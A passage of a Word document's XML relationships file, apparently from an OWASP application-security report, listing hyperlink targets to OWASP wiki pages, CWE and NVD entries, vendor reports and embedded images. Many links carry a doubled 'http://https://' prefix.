Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessController.html" TargetMode="External"/><Relationship Id="rId501" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessController.html" TargetMode="External"/><Relationship Id="rId502" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Guide_to_Authorization" TargetMode="External"/><Relationship Id="rId503" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Guide_to_Authorization" TargetMode="External"/><Relationship Id="rId504" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Guide_to_Authorization" TargetMode="External"/><Relationship Id="rId505" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Guide_to_Authorization" TargetMode="External"/><Relationship Id="rId506" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Guide_to_Authorization" TargetMode="External"/><Relationship Id="rId507" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Guide_to_Authorization" TargetMode="External"/><Relationship Id="rId508" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_Path_Traversal" TargetMode="External"/><Relationship Id="rId509" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_Path_Traversal" TargetMode="External"/><Relationship Id="rId730" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/OWASP_Guide_Project" TargetMode="External"/><Relationship Id="rId731" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Category:OWASP_Orizon_Project" TargetMode="External"/><Relationship Id="rId732" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Category:OWASP_Orizon_Project" TargetMode="External"/><Relationship Id="rId733" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/OWASP_Testing_Project" TargetMode="External"/><Relationship Id="rId734" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://code.google.com/p/zaproxy/wiki/HelpStartConceptsAscan" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ruggedsoftware.org/" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ruggedsoftware.org/" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ruggedsoftware.org/" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.aspectsecurity.com/" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.aspectsecurity.com/" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.aspectsecurity.com/uploads/downloads/2013/06/Aspect-2013-Global-AppSec-Risk-Report.pdf" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hpenterprisesecurity.com/" TargetMode="External"/><Relationship Id="rId735" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://code.google.com/p/zaproxy/wiki/HelpStartConceptsAscan" TargetMode="External"/><Relationship Id="rId736" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image102.jpeg"/><Relationship Id="rId737" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image103.jpeg"/><Relationship Id="rId738" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image104.jpeg"/><Relationship Id="rId739" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image105.jpeg"/><Relationship Id="rId620" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sonatype.com/content/download/1025/10060/file/sonatype_executive_security_brief_final.pdf" TargetMode="External"/><Relationship Id="rId621" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/" TargetMode="External"/><Relationship Id="rId622" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/" TargetMode="External"/><Relationship Id="rId623" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/" TargetMode="External"/><Relationship Id="rId624" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/" TargetMode="External"/><Relationship Id="rId625" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/" TargetMode="External"/><Relationship Id="rId626" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0277" TargetMode="External"/><Relationship Id="rId627" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0277" TargetMode="External"/><Relationship Id="rId628" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0277" TargetMode="External"/><Relationship Id="rId629" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0277" TargetMode="External"/><Relationship Id="rId510" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_Path_Traversal" TargetMode="External"/><Relationship Id="rId511" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_Path_Traversal" TargetMode="External"/><Relationship Id="rId512" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_Path_Traversal" TargetMode="External"/><Relationship Id="rId513" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_Path_Traversal" TargetMode="External"/><Relationship Id="rId514" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_Path_Traversal" TargetMode="External"/><Relationship Id="rId515" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Forced_browsing" TargetMode="External"/><Relationship Id="rId516" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Forced_browsing" TargetMode="External"/><Relationship Id="rId517" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Forced_browsing" TargetMode="External"/><Relationship Id="rId518" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Forced_browsing" TargetMode="External"/><Relationship Id="rId519" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Forced_browsing" TargetMode="External"/><Relationship Id="rId740" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image106.jpeg"/><Relationship Id="rId741" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image107.jpeg"/><Relationship Id="rId742" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image108.jpeg"/><Relationship Id="rId743" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image109.jpeg"/><Relationship Id="rId744" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image110.jpeg"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.mindedsecurity.com/" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.mindedsecurity.com/" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.mindedsecurity.com/2013/02/real-life-vulnerabilities-statistics.html" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.softtek.com/" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.softtek.com/webdocs/special_pdfs/WP-State-of-the-art-2013.pdf" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.trustwave.com/spiderlabs/" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.trustwave.com/spiderlabs/" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.veracode.com/" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://info.veracode.com/rs/veracode/images/VERACODE-SOSS-V4.PDF" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.whitehatsec.com/" TargetMode="External"/><Relationship Id="rId400" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.jpeg"/><Relationship Id="rId401" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.jpeg"/><Relationship Id="rId402" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.jpeg"/><Relationship Id="rId403" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.jpeg"/><Relationship Id="rId404" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.jpeg"/><Relationship Id="rId405" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.jpeg"/><Relationship Id="rId406" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.jpeg"/><Relationship Id="rId407" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId408" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId409" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId745" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image111.jpeg"/><Relationship Id="rId746" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image112.jpeg"/><Relationship Id="rId747" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image113.jpeg"/><Relationship Id="rId748" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Clickjacking" TargetMode="External"/><Relationship Id="rId749" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_Race_Conditions_(OWASP-AT-010)" TargetMode="External"/><Relationship Id="rId630" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0277" TargetMode="External"/><Relationship Id="rId631" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0277" TargetMode="External"/><Relationship Id="rId632" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0277" TargetMode="External"/><Relationship Id="rId633" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0277" TargetMode="External"/><Relationship Id="rId634" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0277" TargetMode="External"/><Relationship Id="rId635" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0277" TargetMode="External"/><Relationship Id="rId636" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0277" TargetMode="External"/><Relationship Id="rId637" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0277" TargetMode="External"/><Relationship Id="rId638" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0277" TargetMode="External"/><Relationship Id="rId639" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0277" TargetMode="External"/><Relationship Id="rId520" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId521" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId522" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId523" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId524" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId525" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId526" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId527" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId528" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/285.html" TargetMode="External"/><Relationship Id="rId529" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/285.html" TargetMode="External"/><Relationship Id="rId750" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/917.html" TargetMode="External"/><Relationship Id="rId751" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Top_10_2007-A6" TargetMode="External"/><Relationship Id="rId752" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/799.html" TargetMode="External"/><Relationship Id="rId753" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Top_10_2007-A6" TargetMode="External"/><Relationship Id="rId754" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ApplicationLayerIntrustionDetection" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.whitehatsec.com/" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.whitehatsec.com/" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasptop10.googlecode.com/files/WPstats_winter11_11th.pdf" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.jpeg"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.jpeg"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId410" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId411" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId412" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId413" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId414" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId415" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId416" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId417" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Insecure_Cryptographic_Storage" TargetMode="External"/><Relationship Id="rId418" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://csrc.nist.gov/groups/STM/cmvp/documents/140-1/140val-all.htm" TargetMode="External"/><Relationship Id="rId419" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://csrc.nist.gov/groups/STM/cmvp/documents/140-1/140val-all.htm" TargetMode="External"/><Relationship Id="rId755" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ApplicationLayerIntrustionDetection" TargetMode="External"/><Relationship Id="rId756" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ApplicationLayerIntrustionDetection" TargetMode="External"/><Relationship Id="rId757" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ApplicationLayerIntrustionDetection" TargetMode="External"/><Relationship Id="rId758" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ApplicationLayerIntrustionDetection" TargetMode="External"/><Relationship Id="rId759" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ApplicationLayerIntrustionDetection" TargetMode="External"/><Relationship Id="rId640" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image90.jpeg"/><Relationship Id="rId641" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image91.jpeg"/><Relationship Id="rId642" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image92.jpeg"/><Relationship Id="rId643" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image93.jpeg"/><Relationship Id="rId644" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image94.jpeg"/><Relationship Id="rId645" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image95.jpeg"/><Relationship Id="rId646" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image96.jpeg"/><Relationship Id="rId300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/79.html" TargetMode="External"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.jpeg"/><Relationship Id="rId303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.jpeg"/><Relationship Id="rId304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.jpeg"/><Relationship Id="rId305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.jpeg"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.jpeg"/><Relationship Id="rId307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.jpeg"/><Relationship Id="rId308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.jpeg"/><Relationship Id="rId309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.jpeg"/><Relationship Id="rId647" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image97.jpeg"/><Relationship Id="rId648" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image98.jpeg"/><Relationship Id="rId649" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/filters/SecurityWrapperResponse.html" TargetMode="External"/><Relationship Id="rId530" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/285.html" TargetMode="External"/><Relationship Id="rId531" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/285.html" TargetMode="External"/><Relationship Id="rId532" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/285.html" TargetMode="External"/><Relationship Id="rId533" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/285.html" TargetMode="External"/><Relationship Id="rId534" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/285.html" TargetMode="External"/><Relationship Id="rId535" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/285.html" TargetMode="External"/><Relationship Id="rId536" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/CSRF" TargetMode="External"/><Relationship Id="rId537" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image72.jpeg"/><Relationship Id="rId538" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image73.jpeg"/><Relationship Id="rId539" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image74.jpeg"/><Relationship Id="rId760" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Top_10_2007-A3" TargetMode="External"/><Relationship Id="rId761" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/915.html" TargetMode="External"/><Relationship Id="rId762" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Privacy_Violation" TargetMode="External"/><Relationship Id="rId763" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image114.jpeg"/><Relationship Id="rId764" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Threat_Risk_Modeling" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Threat_Risk_Modeling" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Threat_Risk_Modeling" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Threat_Risk_Modeling" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://fairwiki.riskmanagementinsight.com/" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://fairwiki.riskmanagementinsight.com/" TargetMode="External"/><Relationship Id="rId420" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://csrc.nist.gov/groups/STM/cmvp/documents/140-1/140val-all.htm" TargetMode="External"/><Relationship Id="rId421" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://csrc.nist.gov/groups/STM/cmvp/documents/140-1/140val-all.htm" TargetMode="External"/><Relationship Id="rId422" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://csrc.nist.gov/groups/STM/cmvp/documents/140-1/140val-all.htm" TargetMode="External"/><Relationship Id="rId423" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://csrc.nist.gov/groups/STM/cmvp/documents/140-1/140val-all.htm" TargetMode="External"/><Relationship Id="rId424" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Scrypt" TargetMode="External"/><Relationship Id="rId425" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Scrypt" TargetMode="External"/><Relationship Id="rId426" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId427" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId428" 